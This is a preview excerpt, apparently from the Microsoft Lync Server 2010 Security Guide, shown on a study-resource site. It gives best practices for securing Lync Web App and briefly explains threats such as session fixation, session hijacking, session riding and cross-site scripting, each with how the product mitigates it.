In this section best practices for lync web app

Info icon This preview shows pages 46–48. Sign up to view the full content.

View Full Document Right Arrow Icon
is possible to use a single virtual server for both internal and external access. In This Section Best Practices for Lync Web App Threats to Lync Web App Securing Lync Web App Sessions Using PKI, Certificates, and SSL for Lync Web App Best Practices for Lync Web App Use a reverse proxy deployed in the perimeter network to enhance the security of Lync Web App on the Internet. Observe security settings for Internet Information Services (IIS), based on your server operating system version choice: IIS 7.0: Configuring Security at http://go.microsoft.com/fwlink/?LinkId=145232 IIS 7.5: Internet Information Services (IIS) 7.5 at http://go.microsoft.com/fwlink/? LinkId=217605 42
Image of page 46

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full Document Right Arrow Icon
Microsoft Lync Server 2010 Security Guide Choose authentication methods to fit your users’ needs: Integrated Password Authentication. Uses NTLM/Kerberos to provide encrypted logon methods for internal users Forms-Based Authentication. Provides a username/password prompt and supports external user authentication, users of Macintosh, Linux, and users not running the Internet Explorer Internet browser Custom authentication, Supports methods such as PIN input, and smart card Threats to Lync Web App This topic describes potential threats to Lync Web App. Session Fixation In a session fixation attack, the attacker sets the user’s session token before the session is established between the user and the web server. By doing so, the attacker already has the session ID and does not need to determine it after the session is established. Lync Web App is designed to minimize this threat. Session Hijacking In session hijacking, the attacker accesses a user’s session by sniffing unencrypted traffic on the network. Lync Web App minimizes this threat by using SSL as the default communication protocol between the client and Lync Web App. Session Riding/Double Riding Session riding is when an attacker attempts to use an established session between a user and a web-based application to run commands while posing as the user. The attacker does so by sending the user an email message or otherwise enticing the user to visit a website specifically developed to run malicious software. The commands that can be run by the attacker include opening firewalls, deleting data, and running other commands within the internal network. Lync Web App is designed to prevent an attacker from using this method to control a user’s Lync Web App session through a malicious website. Cross Site Scripting (CSS, XSS, Code Insertion) A cross-site scripting attack (sometimes referred to as a CSS, XSS, or code insertion attack) occurs when an attacker uses a web application to send malicious software, generally in the form of a script, to a target user. The target user’s browser has no way of detecting that the script should not be trusted and will run the script. When the malicious script is run, it can access cookies, session tokens, or other sensitive information that is retained by the end user’s browser.
Image of page 47
Image of page 48
This is the end of the preview. Sign up to access the rest of the document.

{[ snackBarMessage ]}

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern